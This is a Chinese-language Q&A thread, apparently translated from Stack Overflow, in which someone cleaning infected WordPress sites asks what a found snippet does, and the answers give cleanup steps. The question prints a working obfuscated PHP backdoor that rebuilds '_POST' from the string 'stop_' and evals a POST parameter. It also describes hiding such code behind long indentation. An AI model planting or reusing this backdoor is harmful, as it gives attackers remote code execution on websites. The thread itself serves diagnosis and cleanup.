Wordpress恶意代码,它实际上做了什么?

时间:2015-03-24 18:40:03

标签: php wordpress

所以,今天我清理了一些客户的网站,发现很多wordpress插件上都有很多整洁的恶意代码。

有些非常整洁(= D),但最好的一个是在<?php之后放置大量缩进并将恶意代码放在?>结尾并打开另一个之前的旧技巧该行末尾为<?php,因此看起来只有一个<?php

现在,我要问的是恶意代码会做什么?这是我找到的示例代码之一:

$qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}

上面的代码应该产生错误($qv不是数组),但事实并非如此。任何人都可以解释它是什么?

2 个答案:

答案 0 :(得分:0)

1)安装新的wordpress。(新) 2)下载所有插件(新) 3)连接旧数据库 4)添加所有上传媒体 5)检查你的theam&amp;模板和Js文件。

查找和替换

 $qV="stop_";
$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);
if(isset(${$s20}['q571d85'])) {
eval(${$s20}['q571d85']);
}

答案 1 :(得分:0)

首先检查Wordpress版本并从wordpress.org下载相同版本。用最新下载的文件替换wp-admin,wp-include和root文件。一旦你将这个恶意软件保留在你的插件和主题中。接下来只需使用最新的插件升级你的插件,它也将从插件中完成。

要检入它们,您可以使用任何防病毒扫描,它将找到恶意软件代码。你可以在所有文件中手动删除它几乎相同的代码。

希望这会有所帮助!